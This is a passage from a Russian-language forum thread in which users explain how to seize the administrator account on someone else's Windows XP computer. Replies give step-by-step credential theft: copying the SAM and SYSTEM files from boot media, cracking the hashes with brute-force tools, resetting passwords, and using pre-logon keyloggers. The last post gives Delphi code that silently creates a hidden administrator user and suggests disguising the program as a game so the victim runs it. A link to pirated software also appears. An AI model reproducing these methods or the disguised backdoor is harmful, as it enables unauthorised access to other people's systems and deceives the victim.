Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2
RSS
Как получить права Админа?
 
Цитата
mzzz пишет:
 
проинсталлировать на Флашку Брут Форс, и просканить  на взлом пароля учетной записи админа.
Что имеется в виду? Если импорт хэшей паролей с локальной машины - не выйдет без админовских прав.

И что за зверь такой - "Брут форс"? И роль флэшки во всей этой истории?

Реально, загрузившись с CD с любой оси (DOS, Винд), слямзить файлы sam и system. Затем перегрузиться в родной винд., с пом. прогр. Saminside, например, импортировать из этих файлов хэши (тут уже не нужно админовских прав) и подобрать пароль. Поищи по форуму, это уже 100 раз обсуждалось. Затем с гордостью показать все это парню. Только шпионить не надо, а то очень обидно, когда за тобой шпионят

Да, кстати, файловая система-то какая?
 
mzzz
Цитата
Если у нее NTFS, то нишиша у нее не выйдет.
А это смотря как права распределены. И потом: если я не ошибаюсь, можно в реестре временно создать юзера через live-cd и дать ему права к диску
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Jul_i
Цитата
Да, кстати, файловая система-то какая?
Боюсь, она этого незнает... Придётся ей объяснять как посмотреть ФС ;)
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Всем привет!!!  мне надо всё это переварить, так как сейчас ночь на дворе,не соображаю! А вот мысль возникла, а возможно ли узнать пароль администратора, через клавиатурного шпиона? Вот одно смущает там стоит KIS 2006! А шпионить я за ним не буду, я просто если получу доступ сменю пароль на свой! :) и усмехнусь!    У нас типа игра!  Кто кого!
 
Да ещё, winda у нас,XP с SP2 система файловая NTFS
 
<center>Реально, загрузившись с CD с любой оси (DOS, Винд), слямзить файлы sam и system. Затем перегрузиться в родной винд., с пом. прогр. Saminside, например, импортировать из этих файлов хэши (тут уже не нужно админовских прав) и подобрать пароль.</center>
Jul_i легко говорить когда умеете, а где подробней можно узнать?
      
 
Файлы Sam и System (без расширений) лежат в ...\windows\system32\config. Но из под той же винды, частью которой они являются они не откроются и не перепишутся, т.к. уже открыты системой. Нужно загрузиться с другой системы.
Вот тут важно, какая файл. сист. Посмотреь - в "Мой комп." свойствах дисков. Если Фат-32, то можно грузиться с Досовской дискеты, хоть той, что создается в винде. Если NTFS, то ссылки на диски с поддержкой ее здесь
http://www.securitylab.ru/forum//search.asp?KW=icwt&SM=1&SI= PT&FM=0&OB=1

Подробная инструкция к программе Saminside (на русском) и статья о хранеии паролей в винд. - на официальном сайте этой проги. http://www.insidepro.com/rus/saminside.shtml
http://www.insidepro.com/doc/002r.shtml
Обзор других прог по подбору паролей:
http://www.nht-team.ru/forum/index.php?showtopic=4580&st=0

А если просто поменять пароль, не спрашивая старого, то ERD commander (если найдешь его образ) или скачать Winternals Administrators Pak
http://www.sonic2k.com/apps?Winternals.Administrators.Pak.v4 .2.WinNT2kXP2k3-SSG.rar
(примерно 75М) и сделать загрузочный диск с ERD. Там есть утилита Locksmith, которой просто меняешь пароль.
 
Брут Форс - это метод взлома пароля посредством словарного либо последовательного перебора. Стар как наш мир и неэффективен в домене. А на локальной колымаге хляет. А флеш память нужна для создания самостоятельного раздела, с которого можно будет запустить проинсталлированный брут форс. И импорт хешей не нужен - он покажет пароль графически.

Единственная загвоздка - NTFS. Она может не позволить приложению открыться.
 
Цитата
Shanker пишет:
mzzz
Цитата
Если у нее NTFS, то нишиша у нее не выйдет.
И потом: если я не ошибаюсь, можно в реестре временно создать юзера через live-cd и дать ему права к диску
Во первых, я не думаю, что это получится. Во вторых, что даст нам право к диску? Цель наша - пароль админа.
 
По крайней мере, NHT Leave CD плюет на раздельный доступ пользователей к папкам, установленный в родной винде.   

О брутфорсе на локальной машине - он наверное применяется не от хорошей жизни, когда нет возможности импортировать хэши. Какова скорость по сравнению с перебором, когда были импортированы хэш заранее? Напр. PwSEX на Celeron 1,7GHz 3600 000 п/сек по импортир. NTLМ хэшам.
 
Bart Pe (писал выше) работает с файловой системой NTFS версии 3.1 включительно. Проверить свою версию можно командой C:\fsutil fsinfo ntfsinfo C:, то есть поддерживаются все команды типа копирования, перемещения, переименования, удаления. Файли и директории, зашифрованные операционной системой расшифровке (обычной) не подлежат. Для расшифровки таких файлов нужен пароль (не новый а старый). На диске имеется файловый менеджер, способный работать с диском, можно использовать и свой, предварительно скопировав его на диск.
Дальше, про программы для расшифровки паролей, их можно также переписать на загрузочный диск. Существуют специальные утилиты, позволяющие редактировать или сбрасывать пароли пользователей Windows NT/2000/XP. Принцип работы большинства из них заключается в загрузке минимальной версии альтернативной операционной системы, например DOS, Linux, Batr Pe или любая другая, на которую глаз положите.
Пример подобной утилиты можно найти по этому адресу:
http://home.eunet.no/~pnordahl/ntpasswd/
Инструкции по работе, так же как файлы для создания загрузочного диска Linux, доступны на этом же сайте.
Можно переписать файлы config и SAM и попытаться расшифровать пароли, которые в них хранятся, с помощью специальных утилит сторонних производителей. Программы для расшифровки паролей: LC4 или Proactive Windows Security Explorer.
Желательно иметь:
1. Доступ к другому компьютеру.
2. Как минимум две пустые дискеты или загрузочный (подготовленный) CD и дискету для сброса инфы.
3. Архиватор, рассчитанный на работу с командной строкой, например, RAR.
4. Загрузочный диск DOS или Windows 98 (имидж необходимого диска можно получить по адресу http://www.bootdisk.com/) или минимальная версия Linux (например, Knoppix). Необходимость в загрузочных дисках отпадает, если вы можете просто подключить к другому компьютеру свой жесткий диск. Если вы используете загрузочный диск DOS, а разделы на вашем жестком диске используют файловую систему NTFS, то для доступа к ним вам понадобится программа, позволяющая под управлением DOS просматривать разделы в формате NTFS, например, NTFSDOS.
5. Программа для получения паролей - Proactive Windows Security Explorer (бэта-версия этой программы является бесплатной),  бесплатная версия LC4 очень ограничена (Яндеск поможет с ключами).
1. Если на жестком диске есть разделы в формате NTFS, копируем файл NTFSDOS на загрузочную дискету.
2. Скопируйте на загрузочную дискету архиватор (RAR).
3. Загрузите компьютер с этой дискеты. Если есть разделы с NTFS, наберите команду NTFSDOS, эта программа покажет, какая буква присвоена вашему системному диску, ее и нужно будет использовать вместо буквы C в следующем пункте.
4. Поместите в архив системные файлы с паролями. Например, если вы используете архиватор rar32, соответствующая команда будет выглядеть так: Rar32 a -v a:systemandsam c:windowssystem32configsystem c:windowssystem32configsam Если файлы не поместятся на
одну дискету, архиватор попросит вас вставить вторую.
Если есть загрузочный CD, все это не потребуется, просто зайдете в необходимые каталоги и скопируете на дискету нужные файлы.
Дальше о подборе:
Каждая из выбранных вами программ выведет список обнаруженных в файле SAM учетных записей. Выберите те из них, пароли к которым вам нужно определить. Если вы используете Proactive Windows Security Explorer, выберите Atack type: Brute-force. Если вы использовали в пароле только цифры, отметьте пункт all digits (0-9). Начните процесс подбора пароля с помощью команды из
меню Recovery. Подбор пароля может длиться от 10 минут до нескольких часов, а то и нескольких дней, и может закончиться неудачно. Особенно, если в пароле используются буквы в различных регистрах, цифры и специальные символы.
Для справки о прямом переборе: если используется 128 битное шифрование, пароль состоит к примеру из 20 символов, в пароле есть буквы только латинские и еще есть цифры, то 34 в 20 степени = 4261655511456885005249781170176 вариантов (один из которых правильный), при скорости перебора в миллион паролей в секунду (мой делает 470 тыс.) уйдет 135136209774761701 лет. При увеличении длины пароля и вариантов его написания (регистр, спецсимволы) время перебора увеличивается. Если сделал ошибку в
расчетах, то ups! Но где то примерно так.
Если использовались возможности утилиты syskey, то про все вышеописанное можно забыть...
 
Цитата
Ice Dog пишет:
Если использовались возможности утилиты syskey, то про все вышеописанное можно забыть...

не все
Syskey не помеха для Saminside, того же Proactive windows secyrity explorer (или, как еще называют, PWSEX), LCP и .... Из менялок - для ERD commanderа

Вариант для особо ленивых: http://www.loginrecovery.com/ - скачиваешь у них загрузочную дискетку, загружаешься с нее, идешь пить чай. Прога забирает хэши паролей, все - автоматически, даже комп выключится сам. Работает с любыми файл. системами, даже с EFS дисками. Затем отсылаешь им эти хэши и они подбирают и высылают пароль.

А еще лучше им ничего не высылать, а самому затем подобрать пароли (тем более, что у них может не быть rainbow tables для паролей с русскими символами).
 
Jul_i спасибо, и всем спасибки! будем пробывать! Если что я тему подниму! Если вдруг какой вопрос.
 
Nimda
Клавиатурный шпион? Нет, т.к. он загрузится ПОСЛЕ аутентификации юзера. Есть замена стандартной dll отвечающей за аутентификацию: она делает всё что и стандартная + сохраняет набранное в файл. Тока детектится всеми антивирями давно

Но если нужно тока пасс поменять - ERD Commander тебе в помощь

mzzz
Цитата
Во первых, я не думаю, что это получится. Во вторых, что даст нам право к диску? Цель наша - пароль админа.
А почему не должно получиться?
А даст это нам возможность скопировать sam и system файлы.
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
В DreampackPL есть кейлоггер, который грузится до аутентификации. Но тоже палится антивирусами

Вот тут http://www.blazingtools.com/downloads.html#xppl еще наткнулась на такую штучку
XP Logon Password Logger (language: English). Судя по названию - может то, что надо.
 
Я тут подумал может проще закодить (например на Делфи) прогу:
________________________________________________
program Hack;

uses
Windows;

var
reg  : Tregistry;

begin
nbsp; nbsp; nbsp;//Создаём пользователя с полными правами
 winexec(net user 31337 ruzone /add,sw_hide);
 winexec(net localgroup Администраторы 31337 /add,sw_hide);
 
end.
_________________________________________________
Естественно что это должно запускаться с правами админа, как вариант это можно замаскировать под игрульку и бросить куда-нибудь на видное место.
Страницы: Пред. 1 2
Читают тему